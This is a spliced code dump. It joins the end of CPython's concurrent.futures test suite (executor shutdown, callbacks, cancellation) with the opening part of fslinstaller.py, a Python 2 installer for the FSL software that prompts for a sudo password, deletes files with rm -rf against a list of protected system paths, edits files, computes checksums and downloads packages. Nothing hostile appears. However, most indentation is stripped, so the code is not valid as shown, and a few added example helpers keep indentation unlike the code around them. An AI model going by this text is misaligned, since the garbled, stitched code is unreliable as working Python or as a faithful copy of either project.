# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
fslinstaller.py
|
#!/usr/bin/python
# Handle unicode encoding
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
try:
import json
HAS_JSON = True
except:
HAS_JSON = False
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
CURRENT = 0
UPDATE = 1
UPGRADE = 2
class Version(object):
def __init__(self, version_string):
v_vals = version_string.split('.')
for v in v_vals:
if not v.isdigit():
raise ValueError('Bad version string')
self.major = int(v_vals[0])
try:
self.minor = int(v_vals[1])
except IndexError:
self.minor = 0
try:
self.patch = int(v_vals[2])
except IndexError:
self.patch = 0
try:
self.hotfix = int(v_vals[3])
except IndexError:
self.hotfix = 0
def __repr__(self):
return "Version(%s,%s,%s,%s)" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __str__(self):
if self.hotfix == 0:
return "%s.%s.%s" % (self.major, self.minor, self.patch)
else:
return "%s.%s.%s.%s" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __ge__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self > other or self == other:
return True
return False
def __le__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self < other or self == other:
return True
return False
def __cmp__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__lt__(other):
return -1
if self.__gt__(other):
return 1
return 0
def __lt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major < other.major:
return True
if self.major > other.major:
return False
if self.minor < other.minor:
return True
if self.minor > other.minor:
return False
if self.patch < other.patch:
return True
if self.patch > other.patch:
return False
if self.hotfix < other.hotfix:
return True
if self.hotfix > other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __gt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major > other.major:
return True
if self.major < other.major:
return False
if self.minor > other.minor:
return True
if self.minor < other.minor:
return False
if self.patch > other.patch:
return True
if self.patch < other.patch:
return False
if self.hotfix > other.hotfix:
return True
if self.hotfix < other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __eq__(self, other):
if not isinstance(other, Version):
return NotImplemented
if (
self.major == other.major and
self.minor == other.minor and
self.patch == other.patch and
self.hotfix == other.hotfix):
return True
return False
def __ne__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__eq__(other):
return False
return True
version = Version('3.0.10')
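# Illustrative sketch, not used by the installer: how Version objects above
# are expected to compare. The literal version strings are arbitrary
# examples, not versions guaranteed to exist on any FSL server.
def _example_version_ordering():
    old = Version('5.0.9')
    new = Version('5.0.10')
    assert new > old                        # patch 10 beats patch 9
    assert old >= Version('5.0.9')          # equal versions satisfy >=
    assert str(Version('6.0')) == '6.0.0'   # missing fields default to 0
    return sorted([new, old])               # oldest first, via __lt__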
def memoize(f, cache={}):
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
class InstallError(Exception):
pass
class shell_colours(object):
default = '\033[0m'
rfg_kbg = '\033[91m'
gfg_kbg = '\033[92m'
yfg_kbg = '\033[93m'
mfg_kbg = '\033[95m'
yfg_bbg = '\033[104;93m'
bfg_kbg = '\033[34m'
bold = '\033[1m'
class MsgUser(object):
__debug = False
__quiet = False
@classmethod
def debugOn(cls):
cls.__debug = True
@classmethod
def debugOff(cls):
cls.__debug = False
@classmethod
def quietOn(cls):
cls.__quiet = True
@classmethod
def quietOff(cls):
cls.__quiet = False
@classmethod
def isquiet(cls):
return cls.__quiet
@classmethod
def isdebug(cls):
return cls.__debug
@classmethod
def debug(cls, message, newline=True):
if cls.__debug:
mess = str(message)
if newline:
mess += "\n"
sys.stderr.write(mess)
@classmethod
def message(cls, msg):
if cls.__quiet:
return
print msg
@classmethod
def question(cls, msg):
print msg,
@classmethod
def skipped(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))
@classmethod
def ok(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))
@classmethod
def failed(cls, msg):
print "".join(
(shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))
@classmethod
def warning(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.bfg_kbg,
shell_colours.bold,
"[Warning]",
shell_colours.default, " ", msg))
class Progress_bar(object):
def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
self.x = x
self.y = y
self.width = 50
self.current = 0
self.max = mx
self.numeric = numeric
self.percentage = percentage
def update(self, reading):
if MsgUser.isquiet():
return
percent = int(round(reading * 100.0 / self.max))
cr = '\r'
if not self.numeric and not self.percentage:
bar = '#' * int(percent)
elif self.numeric:
bar = "/".join(
(str(reading),
str(self.max))) + ' - ' + str(percent) + "%\033[K"
elif self.percentage:
bar = "%s%%" % (percent)
sys.stdout.write(cr)
sys.stdout.write(bar)
sys.stdout.flush()
self.current = percent
if percent == 100:
sys.stdout.write(cr)
if not self.numeric and not self.percentage:
sys.stdout.write(" " * int(percent))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.numeric:
sys.stdout.write(" " * (len(str(self.max))*2 + 8))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.percentage:
sys.stdout.write("100%")
sys.stdout.write(cr)
sys.stdout.flush()
def temp_file_name(mode='r', close=False):
    '''Create a temporary file via mkstemp and return a tuple
    (file object, file name).
    The file is opened read-only unless mode specifies otherwise. If close
    is True, the file object is closed before returning.
    The file object comes from os.fdopen, so it lacks a usable file name.'''
(tmpfile, fname) = tempfile.mkstemp()
file_obj = os.fdopen(tmpfile, mode)
if close:
file_obj.close()
return (file_obj, fname)
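# A minimal sketch (never called during installation) of how temp_file_name()
# is meant to be used; the same patterns appear later in
# is_writeable_as_root() and self_update().
def _example_temp_file_usage():
    (handle, path) = temp_file_name(mode='w')
    handle.write('scratch data')
    handle.close()
    os.remove(path)  # the caller is responsible for cleaning up
    # When only a file name is needed, ask for the handle to be closed:
    (_, path) = temp_file_name(mode='w', close=True)
    return path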
class RunCommandError(Exception):
pass
class Spinner(object):
spinner = itertools.cycle(('-', '\\', '|', '/', ))
busy = False
delay = 0.2
def __init__(self, delay=None, quiet=False):
if delay:
try:
self.delay = float(delay)
except ValueError:
pass
self.quiet = quiet
def spin_it(self):
while self.busy:
sys.stdout.write(self.spinner.next())
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
if not self.quiet:
self.busy = True
threading.Thread(target=self.spin_it).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(_, error) = cmd.communicate()
except:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
def run_cmd(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
MsgUser.debug("Will call %s" % (command_line))
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(output, error) = cmd.communicate()
except:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
MsgUser.debug("Command completed successfully (%s)" % (output))
return output
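# Illustrative sketch, not invoked anywhere: the intended calling pattern for
# run_cmd(). 'uname -s' is just an assumed, commonly available command.
def _example_run_cmd():
    try:
        kernel = run_cmd('uname -s').strip()
    except RunCommandError, e:
        MsgUser.debug('uname failed: %s' % (str(e)))
        kernel = ''
    return kernel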
def run_cmd_displayoutput(command, as_root=False):
'''Run the command and display output.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
MsgUser.debug("Will call %s" % (command_line))
cmd = Popen(
command_line,
stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
return_code = cmd.returncode
else:
return_code = call(command_line)
if return_code:
MsgUser.debug("An error occured (%s)" % (return_code))
raise RunCommandError(return_code)
MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
command_line = ['sudo', '-S', 'true']
MsgUser.debug("Checking sudo password")
cmd = Popen(
command_line,
stdin=PIPE,
stdout=DEVNULL,
stderr=DEVNULL
)
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
if cmd.returncode != 0:
return False
else:
return True
class SudoPasswordError(Exception):
pass
@memoize
def get_sudo_pwd():
'''Get the sudo password from the user'''
MsgUser.message("We require your password to continue...")
attempts = 0
valid = False
while attempts < 3 and not valid:
sudo_pwd = getpass.getpass('password: ')
valid = check_sudo(sudo_pwd)
if not valid:
MsgUser.failed("Incorrect password")
attempts += 1
if not valid:
raise SudoPasswordError()
return sudo_pwd
class DeletionRefused(Exception):
pass
class SafeDeleteError(Exception):
pass
def safe_delete(fs_object, as_root=False):
'''Delete file/folder, becoming root if necessary.
Run some sanity checks on object'''
banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
'/sbin', '/opt', '/Library', '/System', '/System/Library',
'/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
'/home', '/Applications', '/private', '/etc', '/dev',
'/Network', '/net', '/proc']
if os.path.isdir(fs_object):
del_opts = "-rf"
else:
del_opts = '-f'
if fs_object in banned_items:
raise DeletionRefused('Will not delete %s!' % (fs_object))
command_line = " ".join(('rm', del_opts, fs_object))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise SafeDeleteError(str(e))
return result
class MoveError(Exception):
pass
def move(source, target, as_root):
try:
run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
except RunCommandError, e:
raise MoveError(str(e))
class IsDirectoryError(Exception):
pass
class CopyFileError(Exception):
pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
        raise IsDirectoryError('Source (%s) is a directory!' % (fname))
if os.path.isdir(destination):
        # Ensure the destination ends with a slash when copying into a folder
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
'''Equivalent of grep'''
regex = compile(escape(search_for))
found = False
MsgUser.debug("In file_contains.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = True
break
f.close()
return found
def file_contains_1stline(fname, search_for):
'''Equivalent of grep - returns first occurrence'''
regex = compile(escape(search_for))
found = ''
MsgUser.debug("In file_contains_1stline.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = l
break
f.close()
return found
def line_string_replace(line, search_for, replace_with):
return sub(escape(search_for), escape(replace_with), line)
def line_starts_replace(line, search_for, replace_with):
if line.startswith(search_for):
return replace_with + '\n'
return line
class MoveFileError(Exception):
pass
def move_file(from_file, to_file, requires_root=False):
'''Move a file, using /bin/cp via sudo if requested.
Will work around known bugs in python.'''
if requires_root:
try:
run_cmd_dropstdout(" ".join(
("/bin/cp", from_file, to_file)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
os.remove(from_file)
else:
try:
move(from_file, to_file, requires_root)
except OSError, e:
# Handle bug in some python versions on OS X writing to NFS home
# folders, Python tries to preserve file flags but NFS can't do
# this. It fails to catch this error and ends up leaving the file
# in the original and new locations!
if e.errno == 45:
# Check if new file has been created:
if os.path.isfile(to_file):
# Check if original exists
if os.path.isfile(from_file):
# Destroy original and continue
os.remove(from_file)
else:
try:
run_cmd_dropstdout("/bin/cp %s %s" % (
from_file, to_file), as_root=False)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to copy from %s (%s)" % (
from_file, str(e)))
os.remove(from_file)
else:
raise
except:
raise
class EditFileError(Exception):
pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
'''Search for a simple string in the file given and replace
it with the new text'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
line = edit_function(line, search_for, replace_with)
tmpfile.write(line)
src.close()
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
MsgUser.debug(e)
os.remove(tmpfname)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
MsgUser.debug("Modified %s (search %s; replace %s)." % (
fname, search_for, replace_with))
class AddToFileError(Exception):
pass
def add_to_file(fname, add_lines, requires_root):
'''Add lines to end of a file'''
if isinstance(add_lines, basestring):
add_lines = add_lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
tmpfile.write(line)
src.close()
tmpfile.write('\n')
for line in add_lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise AddToFileError("Failed to add to file %s (%s)" % (
fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror + tmpfname + fname)
raise AddToFileError("Failed to add to file %s" % (fname))
MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
        except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise CreateFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
pass
class Host(object):
'''Work out which platform we are running on'''
o_s = platform.system().lower()
arch = platform.machine()
applever = ''
os_type = os.name
supported = True
if o_s == 'darwin':
vendor = 'apple'
version = Version(platform.release())
(applever, _, _) = platform.mac_ver()
glibc = ''
elif o_s == 'linux':
if hasattr(platform, 'linux_distribution'):
# We have a modern python (>2.4)
(vendor, version, _) = platform.linux_distribution(
full_distribution_name=0)
else:
(vendor, version, _) = platform.dist()
vendor = vendor.lower()
version = Version(version)
glibc = platform.libc_ver()[1]
else:
supported = False
if arch == 'x86_64':
bits = '64'
elif arch == 'i686':
bits = '32'
elif arch == 'Power Macintosh':
bits = ''
def is_writeable(location):
'''Check if we can write to the location given'''
writeable = True
try:
tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
tfile.close()
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
writeable = False
else:
raise
return writeable
def is_writeable_as_root(location):
'''Check if sudo can write to a given location'''
# This requires us to use sudo
(f, fname) = temp_file_name(mode='w')
f.write("FSL")
f.close()
result = False
tmptarget = '/'.join((location, os.path.basename(fname)))
MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
try:
run_cmd_dropstdout(" ".join(('/bin/cp',
fname, tmptarget)), as_root=True)
result = True
os.remove(fname)
run_cmd_dropstdout(" ".join(('/bin/rm',
'-f', tmptarget)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
os.remove(fname)
result = False
MsgUser.debug("Writeable as root? %s" % (result))
return result
class ChecksumCalcError(Exception):
pass
def sha256File(filename, bs=1048576):
'''Returns the sha256 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
fhash = hashlib.sha256()
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
except ImportError:
# No SHA256 support on python pre-2.5 so call the OS to do it.
try:
result = run_cmd(" ".join(('sha256sum', '-b', filename)))
return parsesha256sumfile(result)
except RunCommandError, e:
MsgUser.debug("SHA256 calculation error %s" % (str(e)))
raise ChecksumCalcError
def parsesha256sumfile(sha256string):
'''Returns sha256 sum extracted from the output of sha256sum or shasum -a
256 from OS X/Linux platforms'''
(sha256, _) = sha256string.split("*")
return sha256.strip()
def md5File(filename, bs=1048576):
'''Returns the MD5 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
fhash = hashlib.md5()
except ImportError:
import md5
fhash = md5.new()
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
if chktype == 'sha256':
return sha256File(filename)
if chktype == 'md5':
return md5File(filename)
else:
raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
pass
def open_url(url, start=0, timeout=20):
socket.setdefaulttimeout(timeout)
MsgUser.debug("Attempting to download %s." % (url))
try:
req = urllib2.Request(url)
if start != 0:
req.headers['Range'] = 'bytes=%s-' % (start)
rf = urllib2.urlopen(req)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (url, e.msg))
raise OpenUrlError("Cannot find file %s on server (%s). "
"Try again later." % (url, e.msg))
except urllib2.URLError, e:
if type(e.reason) != str:
errno = e.reason.args[0]
message = e.reason.args[1]
if errno == 8:
# Bad host name
MsgUser.debug("%s %s" % (url,
"Unable to find FSL download "
"server in the DNS"))
else:
# Other error
MsgUser.debug("%s %s" % (url, message))
else:
message = e.reason
raise OpenUrlError(
"Cannot find %s (%s). Try again later." % (url, message))
except socket.timeout, e:
MsgUser.debug(e)
raise OpenUrlError("Failed to contact FSL web site. Try again later.")
return rf
class DownloadFileError(Exception):
pass
def download_file(url, localf, timeout=20):
'''Get a file from the url given storing it in the local file specified'''
try:
rf = open_url(url, 0, timeout)
except OpenUrlError, e:
raise DownloadFileError(str(e))
metadata = rf.info()
rf_size = int(metadata.getheaders("Content-Length")[0])
dl_size = 0
block = 16384
x = 0
y = 0
pb = Progress_bar(x, y, rf_size, numeric=True)
for attempt in range(1, 6):
# Attempt download 5 times before giving up
pause = timeout
try:
try:
lf = open(localf, 'ab')
except:
raise DownloadFileError("Failed to create temporary file.")
while True:
buf = rf.read(block)
if not buf:
break
dl_size += len(buf)
lf.write(buf)
pb.update(dl_size)
lf.close()
except (IOError, socket.timeout), e:
MsgUser.debug(e.strerror)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
pause = 0
if dl_size != rf_size:
time.sleep(pause)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
try:
rf = open_url(url, dl_size, timeout)
except OpenUrlError, e:
MsgUser.debug(e)
else:
break
if dl_size != rf_size:
raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
part_l = [protocol + '://' + base.strip('/')]
part_l.extend([x.strip('/') for x in parts])
return '/'.join(part_l)
def build_url(parts):
part_l = [parts[0].strip('/')]
part_l.extend([x.strip('/') for x in parts[1:]])
return '/'.join(part_l)
class SiteNotResponding(Exception):
pass
